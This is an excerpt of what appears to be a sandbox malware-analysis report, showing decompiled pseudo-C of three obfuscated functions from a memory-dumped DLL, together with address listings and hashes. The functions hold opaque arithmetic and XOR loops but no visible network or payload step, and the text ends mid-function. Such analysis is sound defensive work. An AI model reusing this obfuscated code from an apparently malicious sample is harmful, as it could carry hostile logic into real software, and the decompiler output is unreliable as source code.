                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int* _v96;
                          				signed int _v104;
                          				signed int _v112;
                          				signed int _v120;
                          				signed int _v128;
                          				signed int _v136;
                          				signed int _v144;
                          				signed int _v152;
                          				signed int _v160;
                          				signed int _v168;
                          				signed int _v176;
                          				signed int _v184;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __r13;
                          				void* __r14;
                          				void* __r15;
                          				signed int _t147;
                          				signed int _t157;
                          				signed int _t162;
                          				signed int _t171;
                          				signed int _t174;
                          				signed int _t196;
                          				signed int _t206;
                          				signed int _t210;
                          				signed int _t222;
                          				signed int _t224;
                          				signed int _t234;
                          				signed long long _t242;
                          				signed int* _t245;
                          				void* _t259;
                          				void* _t260;
                          				signed int* _t267;
                          				void* _t273;
                          				void* _t274;
                          				void* _t275;
                          
                          				_t271 = __r12;
                          				_t267 = __r9;
                          				_t261 = __rbp;
                          				_t255 = __rdx;
                          				_a24 = __rbx;
                          				_a32 = __rbp;
                          				r10d = __rcx - 0x1270;
                          				r11d = _a64;
                          				_t245 = __r9;
                          				r9d = _a72;
                          				_t222 = _a40 + 0x106;
                          				r9d = r9d + 0xffffc5a7;
                          				_a56 = _t222;
                          				r14d = __r11 - 0x2598;
                          				_v76 = r9d;
                          				_a72 = r10d;
                          				_v88 = r14d;
                          				_t206 = __rdx + 0x17e6;
                          				_a8 = _t206;
                          				r15d = __rdx + 0x495;
                          				_a40 = r14d;
                          				r13d = __r11 + 0xffd;
                          				_v68 = r15d;
                          				if (r10d - _t274 + 0x36e7 >= 0) goto 0x8c076947;
                          				__r9[0xa0] = 0x39c6;
                          				__r9[0xa1] = 0x295f;
                          				_t248 = __r9[0xc];
                          				 *((intOrPtr*)(__r9[0xc] + 0x58)) =  *((intOrPtr*)(__r9[0xc] + 0x58)) - (__r9[0x12] | 0x00001f2c);
                          				__r9[0xa2] = 8;
                          				if (__r9[0x4c] + 0x3bc - 0x27b2 < 0) goto 0x8c076931;
                          				_t266 = __r9[0x7e] * 0x27ae;
                          				if (0x27b3 - __rdx <= 0) goto 0x8c076920;
                          				__r9[0x28] = __r9[0x7e] * 0x27ae;
                          				__r9[0xa3] = 0x18;
                          				goto 0x8c076d33;
                          				_a16 = __r12;
                          				r8d = _t206;
                          				_v80 = _t206;
                          				if (_t206 - (r15d * r14d ^ r14d) < 0) goto 0x8c076c67;
                          				_t147 =  *__r9;
                          				_v84 = _t147;
                          				_t234 = _t147;
                          				if (_t234 != 0) goto 0x8c076c48;
                          				_v72 = 0x3189 + r15d * 0x2103;
                          				_v64 = r15d * 0xfffff6e7 & 0x00002103;
                          				_v60 = __r9 - 0x30d5;
                          				_v56 = r11d * 0x30d5;
                          				_v48 = (_t206 & 0x00003189) + 0x36e7;
                          				_t157 = __r9[0x1c];
                          				r8d = __r11 + 0xffd;
                          				r13d = __r9[0x6e];
                          				r9d = _t157;
                          				r9d = r9d & r15d;
                          				r11d = r11d - _a56;
                          				r15d = __r9[0x38];
                          				r11d = r11d ^ 0x000027b2;
                          				r14d = __r9[0x50];
                          				r13d = r13d ^ _t222;
                          				r13d = r13d & __r9[0x20];
                          				r14d = r14d - r10d;
                          				r12d = r15d;
                          				r15d = r15d | __r9[0x8a];
                          				r10d = r10d + 0xffffc5a7;
                          				r12d = r12d ^ __r9[0x86];
                          				r12d = r12d ^ __r9[0x16];
                          				r8d = _v88 * 0x30d5;
                          				_v96 = __r9;
                          				r9d = r9d * _t222;
                          				_v104 = __r9[0x74] + 0x37e1;
                          				_v112 = _t206 + __r9[0x48];
                          				_v120 = (_t157 ^ r8d) * 0x2032;
                          				_v128 = r15d;
                          				_v136 = r11d;
                          				_v144 = _v72;
                          				_v152 = r14d;
                          				_v160 = r10d;
                          				_v168 = r12d;
                          				_v176 = r13d;
                          				_v184 = r14d & 0x000036e7;
                          				_t162 = E00007FF87FF88C071B10(_t248, __rdx, _t260, __rbp, _t274, _t275);
                          				_t196 = _a40;
                          				r14d = _t162;
                          				_t224 = _t245[0x32];
                          				r15d = _v68;
                          				r10d = _t245[0x18];
                          				r10d = r10d - r14d;
                          				r11d = _t245[0x16];
                          				r12d = _a72;
                          				r11d = r11d & 0x0000228c;
                          				_v88 = _t162;
                          				r10d = r10d * r12d;
                          				_t245[0x24] = _t245[0x24] - _t245[0x7e] - 0x27b3;
                          				_a56 = _a56 ^ _t224 - _t196 - 0x000027b2;
                          				_a40 = _t196 - 0x1f2c;
                          				r13d = 0x37b0;
                          				r9d = r13d;
                          				r9d = r9d - _t245[0x78];
                          				r9d = r9d & 0x000027ae;
                          				r8d = _t245[0xc];
                          				r8d = r8d & _t245[0x50];
                          				r12d = r12d ^ 0x000027ae;
                          				_v96 = _t245;
                          				_v104 = _t245[0x4c] | 0x00001f2c;
                          				_v112 = r8d;
                          				r8d = _v56;
                          				_v120 = r9d;
                          				r9d = _v60;
                          				_v128 = (_t224 | _t245[4]) + 0x228c;
                          				_v136 = (r14d ^ _a8) + r13d;
                          				_v144 = r10d;
                          				_v152 = r11d;
                          				_v160 = _t245[0x48] - r15d;
                          				_v168 = (_t245[0x54] | r13d) * r15d;
                          				_v176 = r12d;
                          				_v184 = _v64;
                          				_t171 = E00007FF87FF88C088680((_a64 ^ _t245[0x7e]) + 0x2598, _t245, _t245[0x7e] - 0x27b3, __rdx, _t260, _t266, _t267, __r10, __r12, _t273, _t275);
                          				_v84 = _v84 + 2;
                          				r10d = _t171;
                          				_t210 = _a8;
                          				r11d = _a64;
                          				_a72 = _t171;
                          				if (_t234 == 0) goto 0x8c0769d6;
                          				r8d = _v80;
                          				r9d = _v76;
                          				r8d = r8d + 4;
                          				_v80 = r8d;
                          				if (r8d - (r15d * r14d ^ r14d) >= 0) goto 0x8c076970;
                          				_t242 = r10d;
                          				_v48 = _t242;
                          				if (_t210 == _t242 * _t245[0x54] * _t245[0x40]) goto 0x8c076d24;
                          				r12d = r14d;
                          				r12d = r12d | r10d;
                          				r8d = _t245[0x12];
                          				r8d = r8d +  *_t245;
                          				r8d = r8d | 0x00001f2c;
                          				r9d = r9d - _t245[0x88];
                          				_v160 = r15d * r14d ^ _a40;
                          				_v168 = (__r10 - 0x23f6) * r14d;
                          				_v176 = _t245;
                          				_v184 = _t245[0x2e] |  *_t245;
                          				_t174 = E00007FF87FF88C0909D0(r12d, r15d ^ r13d ^ r14d, _t245, _t242 * _t245[0x54] * _t245[0x40], _t255, _t259, _t260, _t261, _t266, _t267, __r11, _t271, _t274, _t275);
                          				r9d = _v76;
                          				r13d = _t174;
                          				if (_t210 + 4 != _v48 * _t245[0x54] * _t245[0x40]) goto 0x8c076cb0;
                          				goto 0x8c076d2b;
                          				return _t273 - 0x2f8;
                          			}


















































                          0x7ff88c076820
                          0x7ff88c076820
                          0x7ff88c076820
                          0x7ff88c076820
                          0x7ff88c076820
                          0x7ff88c076825
                          0x7ff88c076840
                          0x7ff88c076847
                          0x7ff88c07684f
                          0x7ff88c076859
                          0x7ff88c076861
                          0x7ff88c076867
                          0x7ff88c07686e
                          0x7ff88c076875
                          0x7ff88c07687c
                          0x7ff88c07688b
                          0x7ff88c076893
                          0x7ff88c07689b
                          0x7ff88c0768a1
                          0x7ff88c0768a8
                          0x7ff88c0768af
                          0x7ff88c0768b7
                          0x7ff88c0768be
                          0x7ff88c0768cc
                          0x7ff88c0768ce
                          0x7ff88c0768d8
                          0x7ff88c0768e2
                          0x7ff88c0768f0
                          0x7ff88c0768f9
                          0x7ff88c076910
                          0x7ff88c076912
                          0x7ff88c076928
                          0x7ff88c07692a
                          0x7ff88c076931
                          0x7ff88c076942
                          0x7ff88c07694a
                          0x7ff88c076956
                          0x7ff88c076959
                          0x7ff88c076965
                          0x7ff88c076970
                          0x7ff88c076972
                          0x7ff88c076979
                          0x7ff88c07697b
                          0x7ff88c07698d
                          0x7ff88c0769a0
                          0x7ff88c0769ae
                          0x7ff88c0769bc
                          0x7ff88c0769cf
                          0x7ff88c0769d6
                          0x7ff88c0769d9
                          0x7ff88c0769e0
                          0x7ff88c0769e7
                          0x7ff88c0769f5
                          0x7ff88c0769f8
                          0x7ff88c076a03
                          0x7ff88c076a0a
                          0x7ff88c076a0d
                          0x7ff88c076a14
                          0x7ff88c076a17
                          0x7ff88c076a1e
                          0x7ff88c076a28
                          0x7ff88c076a2b
                          0x7ff88c076a32
                          0x7ff88c076a39
                          0x7ff88c076a46
                          0x7ff88c076a50
                          0x7ff88c076a62
                          0x7ff88c076a67
                          0x7ff88c076a7c
                          0x7ff88c076a87
                          0x7ff88c076a8b
                          0x7ff88c076a8f
                          0x7ff88c076a94
                          0x7ff88c076a99
                          0x7ff88c076a9d
                          0x7ff88c076aa2
                          0x7ff88c076aa7
                          0x7ff88c076aac
                          0x7ff88c076ab1
                          0x7ff88c076ab5
                          0x7ff88c076aba
                          0x7ff88c076ac1
                          0x7ff88c076ac4
                          0x7ff88c076aca
                          0x7ff88c076adf
                          0x7ff88c076ae9
                          0x7ff88c076aec
                          0x7ff88c076af3
                          0x7ff88c076afb
                          0x7ff88c076b02
                          0x7ff88c076b0e
                          0x7ff88c076b1a
                          0x7ff88c076b33
                          0x7ff88c076b55
                          0x7ff88c076b5c
                          0x7ff88c076b66
                          0x7ff88c076b6d
                          0x7ff88c076b7a
                          0x7ff88c076b81
                          0x7ff88c076b8a
                          0x7ff88c076b9b
                          0x7ff88c076ba2
                          0x7ff88c076baa
                          0x7ff88c076bb5
                          0x7ff88c076bba
                          0x7ff88c076bc2
                          0x7ff88c076bc7
                          0x7ff88c076bcf
                          0x7ff88c076bd3
                          0x7ff88c076bde
                          0x7ff88c076be3
                          0x7ff88c076be8
                          0x7ff88c076bec
                          0x7ff88c076bf0
                          0x7ff88c076bf5
                          0x7ff88c076bf9
                          0x7ff88c076bfe
                          0x7ff88c076c06
                          0x7ff88c076c09
                          0x7ff88c076c15
                          0x7ff88c076c2b
                          0x7ff88c076c32
                          0x7ff88c076c38
                          0x7ff88c076c40
                          0x7ff88c076c48
                          0x7ff88c076c53
                          0x7ff88c076c61
                          0x7ff88c076c67
                          0x7ff88c076c6d
                          0x7ff88c076c8b
                          0x7ff88c076c9f
                          0x7ff88c076cad
                          0x7ff88c076cb0
                          0x7ff88c076cc0
                          0x7ff88c076cc8
                          0x7ff88c076ccf
                          0x7ff88c076cd9
                          0x7ff88c076cdd
                          0x7ff88c076ce1
                          0x7ff88c076ce6
                          0x7ff88c076cea
                          0x7ff88c076d02
                          0x7ff88c076d0a
                          0x7ff88c076d1b
                          0x7ff88c076d22
                          0x7ff88c076d4e

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ec31a42c203a2aa718200237ebeba28935719d637934978fc03d1ef27e967e0
                          • Instruction ID: 12643776ca6585936b9562e7795a030f5ca701bb4c7e94d962bb6d4e4c61059d
                          • Opcode Fuzzy Hash: 1ec31a42c203a2aa718200237ebeba28935719d637934978fc03d1ef27e967e0
                          • Instruction Fuzzy Hash: 1BD188B7A182C18BD365CF25E04579ABBA4F388788F144139DF8A97B58DB78E944CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00007FF87FF88C08F290(signed int __ecx, signed int __edx, long long __rbx, long long __rdi, signed int __r8, signed int __r9, signed int _a8, signed int _a16, long long _a24, long long _a40, signed int _a48, signed long long _a56, signed int _a64, signed int _a72, intOrPtr _a80, intOrPtr _a88) {
                          				long long _v56;
                          				void* _t154;
                          				void* _t157;
                          				intOrPtr* _t160;
                          				long long _t162;
                          				long long _t165;
                          				signed long long _t173;
                          				signed long long _t188;
                          				signed long long _t198;
                          				signed long long _t211;
                          				signed long long _t220;
                          				long long _t226;
                          				signed long long _t229;
                          				void* _t232;
                          				signed long long _t236;
                          				signed long long _t242;
                          				signed long long _t243;
                          				signed int _t244;
                          				signed long long _t246;
                          
                          				_a8 = __ecx;
                          				_t160 = _a40;
                          				r14d = r8w & 0xffffffff;
                          				r10d = _a64;
                          				r11d = 0;
                          				r15d = __edx & 0x0000ffff;
                          				_t165 =  *((intOrPtr*)(_t160 + 0x158));
                          				r12d = __ecx;
                          				_a16 = __ecx;
                          				 *(_t160 + 0x110) =  *(_t160 + 0x110) - ( *(_t160 + 0xc8) | _t246);
                          				 *(_t232 - 0x18) = _t246;
                          				r8d =  *( *((intOrPtr*)(_t160 + 0x1a0)) + 0x130);
                          				_t211 = _a56;
                          				r8d = r8d - 0x23f7;
                          				_t244 = r8d;
                          				if (_t244 - _t211 >= 0) goto 0x8c08f685;
                          				r9d = _a48;
                          				_a24 = __rbx;
                          				_t162 = _t165;
                          				_v56 = __rdi;
                          				_t226 = _t165;
                          				_a40 = _t165;
                          				asm("o16 nop [eax+eax]");
                          				r8d =  *(_t160 + 0x150);
                          				_t236 = __r8 ^ 0x0000151e;
                          				if (_t236 - _t211 < 0) goto 0x8c08f366;
                          				r9d = __ecx;
                          				_t242 = __r9 ^ _t211;
                          				if (0x36e8 - _t236 <= 0) goto 0x8c08f350;
                          				 *(_t160 + 0x198) = _t242;
                          				r9d = _a48;
                          				 *((intOrPtr*)(_t160 + 0x70)) =  *((intOrPtr*)(_t160 + 0x70)) + 0xffffd84e - _t246;
                          				r8d =  *(_a88 + _t244) & 0x000000ff;
                          				r8b = r8b - _a80;
                          				r8b = r8b ^ _a72;
                          				 *( *((intOrPtr*)(_t160 + 0x50)) + _t162 + _t244) = r8b;
                          				if (r10d == 8) goto 0x8c08f636;
                          				r15d =  *( *((intOrPtr*)(_t160 + 0x50)) + _t162 + _t244) & 0x000000ff;
                          				 *(_t160 + 0x1f0) =  *(_t160 + 0x1f0) ^  *(_t160 + 0x20) * 0x000027ae;
                          				r15b = r15b & (0x00000001 << r10d) - 0x00000001;
                          				if ( *(_t160 + 0xc8) -  *(_t160 + 0x18) <= 0) goto 0x8c08f3f2;
                          				 *( *((intOrPtr*)(_t160 + 0x30)) + 0x1e0) =  *(_t160 + 0x230) ^ __r9;
                          				_t173 =  *((intOrPtr*)(_t160 + 0x40));
                          				if (( *(_t173 + 0xb0) ^ 0x00001052) - 0x37e1 > 0) goto 0x8c08f41f;
                          				 *(_t160 + 0x198) =  *(_t160 + 0x198) + _t173 * 0x125d;
                          				 *(_t160 + 0x198) =  *(_t160 + 0x198) + 0xffffd84e - _t242;
                          				if (r10d == 0) goto 0x8c08f5f8;
                          				r10d = r15b & 0xffffffff;
                          				r10b = r10b >> _t162 - 1;
                          				r10b = r10b & ( *( *((intOrPtr*)(_t160 + 0x1c8)) + 0x188) & 0x000000ff ^ 0x00000032);
                          				 *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x30)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x30)) + 0x198)) + (_t229 | __r9);
                          				if ( *(_t160 + 0x150) == 0x23f6) goto 0x8c08f495;
                          				 *( *((intOrPtr*)(_t160 + 0x30)) + 0xc8) =  *( *((intOrPtr*)(_t160 + 0x30)) + 0xc8) ^  *( *_t160 + 0xe0);
                          				 *( *_t160 + 0xe0) =  *( *_t160 + 0xe0) + 1;
                          				r8d =  *( *((intOrPtr*)(_t160 + 0x30)) + 0x130) * 0x582b602f;
                          				_t154 = r8d - 0x3a5a;
                          				if (_t154 > 0) goto 0x8c08f4d9;
                          				r9d = r14w & 0xffffffff;
                          				_t243 = _t242 + 0x36e7;
                          				r8d = 0x3a5b - r8d;
                          				if (_t154 != 0) goto 0x8c08f4c7;
                          				r9d = _a48;
                          				 *(_t160 + 0x18) =  *(_t160 + 0x18) | _t243;
                          				r11d = r11d + 1;
                          				if (r11d == 0) goto 0x8c08f533;
                          				 *(_t160 + 0xc8) =  *(_t160 + 0x1d0) ^ __r9;
                          				_t220 =  *((intOrPtr*)(_t160 + 0x50));
                          				 *(_t220 + _t226) = ( *(_t220 + _t226) & 0x000000ff) + ( *(_t220 + _t226) & 0x000000ff) | r10b;
                          				if (( *( *((intOrPtr*)(_t160 + 0x140)) + 0x130) ^ 0x0000066f) != 0x37e1) goto 0x8c08f56c;
                          				 *(_t160 + 0x100) =  *(_t160 + 0x10) ^ 0x000027ae;
                          				goto 0x8c08f56c;
                          				 *(_t160 + 0x198) =  *((intOrPtr*)(_t160 + 0xe8)) + 0x3a59;
                          				_t188 =  *((intOrPtr*)(_t160 + 0x50));
                          				 *(_t226 + _t188) = r10b;
                          				 *(_t160 + 0x110) =  *(_t160 + 0x110) + (_t188 | __r9);
                          				 *((intOrPtr*)(_t160 + 0x48)) =  *((intOrPtr*)(_t160 + 0x48)) -  *(_t160 + 0xa0) + __r9;
                          				 *(_t160 + 0x1f0) =  *(_t160 + 0x1f0) +  *(_t160 + 0xa0) - 0x3a59;
                          				_t157 = r11d - (_t220 ^ 0x00003295);
                          				if (_t157 != 0) goto 0x8c08f5e3;
                          				r12d = r12d + 1;
                          				 *((long long*)(_t160 + 0x80)) = 0x33ff;
                          				r11d =  *( *((intOrPtr*)(_t160 + 0x1c8)) + 0x130);
                          				r11d = r11d ^ 0x000023f7;
                          				_t198 =  *((intOrPtr*)(_t160 + 0x1c0)) + 0x110;
                          				 *(_t160 + 0x228) = _t198;
                          				 *(_t160 + 0xa0) = _t198 ^ _t243;
                          				if (_t157 != 0) goto 0x8c08f440;
                          				r10d = _a64;
                          				 *(_t160 + 0x100) =  *(_t160 + 0x100) * ( *(_t160 + 0x110) | 0x00002032);
                          				 *((intOrPtr*)(_t160 + 0x1e0)) =  *((intOrPtr*)(_t160 + 0x1e0)) +  *((intOrPtr*)(_t160 + 0x1b8)) + 0x228c;
                          				 *(_t160 + 0x198) =  *(_t160 + 0x198) + ( *(_t160 + 0xc8) | _t243);
                          				 *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x1c0)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x1c0)) + 0x198)) +  *((intOrPtr*)(_t160 + 0x218));
                          				 *((long long*)(_t160 + 0x218)) =  *((long long*)(_t160 + 0x218)) - 1;
                          				if (_t244 + 1 - _a56 < 0) goto 0x8c08f330;
                          				r12d =  ==  ? _a16 + _a56 : r12d;
                          				return r12d;
                          			}






















                          0x7ff88c08f290
                          0x7ff88c08f2a2
                          0x7ff88c08f2a7
                          0x7ff88c08f2ab
                          0x7ff88c08f2b3
                          0x7ff88c08f2b6
                          0x7ff88c08f2bf
                          0x7ff88c08f2cd
                          0x7ff88c08f2d3
                          0x7ff88c08f2d7
                          0x7ff88c08f2e5
                          0x7ff88c08f2e9
                          0x7ff88c08f2f0
                          0x7ff88c08f2f8
                          0x7ff88c08f2ff
                          0x7ff88c08f305
                          0x7ff88c08f30b
                          0x7ff88c08f310
                          0x7ff88c08f315
                          0x7ff88c08f318
                          0x7ff88c08f31d
                          0x7ff88c08f320
                          0x7ff88c08f325
                          0x7ff88c08f330
                          0x7ff88c08f33c
                          0x7ff88c08f346
                          0x7ff88c08f348
                          0x7ff88c08f34b
                          0x7ff88c08f358
                          0x7ff88c08f35a
                          0x7ff88c08f361
                          0x7ff88c08f370
                          0x7ff88c08f383
                          0x7ff88c08f388
                          0x7ff88c08f390
                          0x7ff88c08f398
                          0x7ff88c08f3a0
                          0x7ff88c08f3bf
                          0x7ff88c08f3c6
                          0x7ff88c08f3cd
                          0x7ff88c08f3db
                          0x7ff88c08f3eb
                          0x7ff88c08f3f2
                          0x7ff88c08f408
                          0x7ff88c08f418
                          0x7ff88c08f42c
                          0x7ff88c08f436
                          0x7ff88c08f443
                          0x7ff88c08f447
                          0x7ff88c08f45f
                          0x7ff88c08f462
                          0x7ff88c08f474
                          0x7ff88c08f484
                          0x7ff88c08f48e
                          0x7ff88c08f499
                          0x7ff88c08f4a4
                          0x7ff88c08f4ab
                          0x7ff88c08f4b6
                          0x7ff88c08f4ba
                          0x7ff88c08f4c4
                          0x7ff88c08f4ce
                          0x7ff88c08f4d0
                          0x7ff88c08f4d5
                          0x7ff88c08f4dc
                          0x7ff88c08f4e1
                          0x7ff88c08f4ed
                          0x7ff88c08f4f4
                          0x7ff88c08f501
                          0x7ff88c08f51d
                          0x7ff88c08f52a
                          0x7ff88c08f531
                          0x7ff88c08f541
                          0x7ff88c08f548
                          0x7ff88c08f54c
                          0x7ff88c08f557
                          0x7ff88c08f568
                          0x7ff88c08f57a
                          0x7ff88c08f595
                          0x7ff88c08f598
                          0x7ff88c08f5a1
                          0x7ff88c08f5a4
                          0x7ff88c08f5b2
                          0x7ff88c08f5c0
                          0x7ff88c08f5c7
                          0x7ff88c08f5ce
                          0x7ff88c08f5dc
                          0x7ff88c08f5e6
                          0x7ff88c08f5ec
                          0x7ff88c08f61a
                          0x7ff88c08f62f
                          0x7ff88c08f64a
                          0x7ff88c08f658
                          0x7ff88c08f65f
                          0x7ff88c08f671
                          0x7ff88c08f690
                          0x7ff88c08f6a5

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e9d4ac3d9a9c46076188db0bcfc194ca47d344c2568f07f4fddbe795ed10baa4
                          • Instruction ID: 4e69fb63869f4591b369b19113abcf72d6454db7104d70f93dc01bee0afd89aa
                          • Opcode Fuzzy Hash: e9d4ac3d9a9c46076188db0bcfc194ca47d344c2568f07f4fddbe795ed10baa4
                          • Instruction Fuzzy Hash: 69A19C72608A8082EB55CB26E8A43BA7BE5F7D9B84F0A9175DF8E47794CF38C451C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 35%
                          			E00007FF87FF88C071B10(void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r14, long long __r15, long long _a8, long long _a16, long long _a24, signed int _a32, signed int _a64, signed int _a72, signed int _a80, long long _a128) {
                          				long long _v40;
                          				signed int _v56;
                          				signed int _v64;
                          				signed int _v72;
                          				long long _v80;
                          				intOrPtr _v88;
                          				signed int _v96;
                          				signed int _v104;
                          				signed int _v112;
                          				signed int _v120;
                          				signed int _v128;
                          				signed int _v136;
                          				void* __rbx;
                          				signed int _t140;
                          				signed int _t153;
                          				signed int _t172;
                          				void* _t180;
                          				void* _t185;
                          				void* _t190;
                          				intOrPtr _t206;
                          				signed long long _t213;
                          				long long _t215;
                          				signed long long _t219;
                          				signed long long _t225;
                          				intOrPtr _t228;
                          				void* _t231;
                          				intOrPtr _t241;
                          				void* _t242;
                          				void* _t243;
                          
                          				_a32 = r9d;
                          				r12d = _a80;
                          				r10d = __rcx + 0xd1;
                          				r13d = _a72;
                          				r12d = r12d + 0xffffed95;
                          				_t215 = _a128;
                          				r13d = r13d + 0xb4;
                          				r9d = __rdx - 0x23f6;
                          				_t172 = __rdx + 0x119f;
                          				_a32 = _t172;
                          				if (r9d - __rcx - 0x119f > 0) goto 0x8c071ed4;
                          				if (r9d - _t243 - 0x1086 > 0) goto 0x8c071d7a;
                          				r11d = 0;
                          				if ( *((intOrPtr*)(_t215 + 0x270)) - r11d <= 0) goto 0x8c071d59;
                          				if ( *((long long*)(_t215 + 0x70)) - 0x228c > 0) goto 0x8c071bbc;
                          				 *( *(_t215 + 0x1c0) + 0x1b0) =  *( *(_t215 + 0x1c0) + 0x1b0) ^ 0x00005b5c;
                          				r10d = 0;
                          				_t185 =  *((intOrPtr*)(_t215 + 0x274)) - r10d;
                          				if (_t185 <= 0) goto 0x8c071ccb;
                          				 *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x278) * 4) =  *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x278) * 4) ^  *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x27c) * 4);
                          				if (_t185 >= 0) goto 0x8c071c03;
                          				_t228 =  *((intOrPtr*)(_t215 + 0x210));
                          				r8d =  *(_t228 +  *(_t215 + 0x278) * 4);
                          				if ((( *(_t215 + 0x28c) & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 == 0) goto 0x8c071c1c;
                          				asm("inc ecx");
                          				 *((intOrPtr*)(_t228 +  *(_t215 + 0x27c) * 4)) =  *((intOrPtr*)(_t228 +  *(_t215 + 0x27c) * 4)) + r8d;
                          				if ( *((long long*)(_t215 + 0x220)) != 0x27b2) goto 0x8c071c4e;
                          				_t219 =  *(_t215 + 0x218) ^ 0x0000329d;
                          				 *(_t215 + 0x10) =  *(_t215 + 0x10) * _t219;
                          				_t241 =  *((intOrPtr*)(_t215 + 0x1a0));
                          				if ( *(_t241 + 0x188) * 0xd50c7428 - 0x23f6 < 0) goto 0x8c071c93;
                          				 *(_t215 + 0x198) =  *(_t215 + 0x100) ^ 0x00002103;
                          				if (0x23f7 - _t219 <= 0) goto 0x8c071c77;
                          				r10d = r10d + 1;
                          				_t153 =  *(_t215 + 0x238);
                          				asm("cdq");
                          				 *(_t215 + 0x278) = ( *(_t215 + 0x278) + 1) % _t153;
                          				asm("cdq");
                          				 *(_t215 + 0x27c) = ( *(_t215 + 0x27c) + 1) % _t153;
                          				_t190 = r10d -  *((intOrPtr*)(_t215 + 0x274));
                          				if (_t190 < 0) goto 0x8c071bd0;
                          				 *(_t215 + 0x58) =  *(_t215 + 0x48) * 0x3666;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x278) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x278) * 4)) +  *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x27c) * 4);
                          				if (_t190 >= 0) goto 0x8c071d11;
                          				_t206 =  *((intOrPtr*)(_t215 + 0x210));
                          				if ((( *(_t215 + 0x288) & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 == 0) goto 0x8c071d2c;
                          				r8d =  *(_t206 +  *(_t215 + 0x278) * 4);
                          				asm("inc ecx");
                          				goto 0x8c071d37;
                          				r8d =  *(_t206 +  *(_t215 + 0x278) * 4);
                          				r11d = r11d + 1;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x27c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x27c) * 4)) + r8d;
                          				if (r11d -  *((intOrPtr*)(_t215 + 0x270)) < 0) goto 0x8c071ba0;
                          				_t225 =  *((intOrPtr*)( *(_t215 + 0x1c0) + 0x1b8)) - 0x2103;
                          				 *(_t215 + 0x198) = _t225;
                          				goto 0x8c071ed4;
                          				if ( *(_t215 + 0x100) - r9d +  *(_t215 + 0x188) <= 0) goto 0x8c071ed4;
                          				_t140 =  *(_t215 + 0x100);
                          				r10d = r10d & r9d;
                          				r8d =  *(_t215 + 0x188);
                          				_a8 = __rbp;
                          				_a64 = r10d;
                          				r10d =  *(_t215 + 0x130);
                          				r10d = r10d & _t140;
                          				_a16 = __rsi;
                          				r10d = r10d - 0x2598;
                          				r9d =  *(_t215 + 0xe0);
                          				_a24 = __r14;
                          				r14d =  *(_t215 + 0x120);
                          				r11d = r12d * 0x3666;
                          				r14d = r14d | r12d;
                          				_v40 = __r15;
                          				r14d = r14d + r8d;
                          				r15d =  *(_t215 + 0x90);
                          				r9d = r9d | 0x00001f2c;
                          				r9d = r9d ^  *(_t215 + 0x78);
                          				r15d = r15d & 0x00001a58;
                          				r15d = r15d | 0x00002001;
                          				r12d = r12d | 0x000027b2;
                          				_v56 = r15d;
                          				r11d = r11d ^ _t140;
                          				_v64 = r14d;
                          				_v72 = r13d & 0x00002598;
                          				_v80 = _t215;
                          				r8d = r8d - _t172;
                          				_v88 = _t225 + _t241;
                          				_v96 =  *(_t215 + 0x48) * r9d;
                          				_v104 = _a64;
                          				_v112 = r11d;
                          				_v120 = r10d;
                          				_v128 =  *((intOrPtr*)(_t215 + 0xb0)) + 0x00001f2c | r8d;
                          				_v136 = r12d;
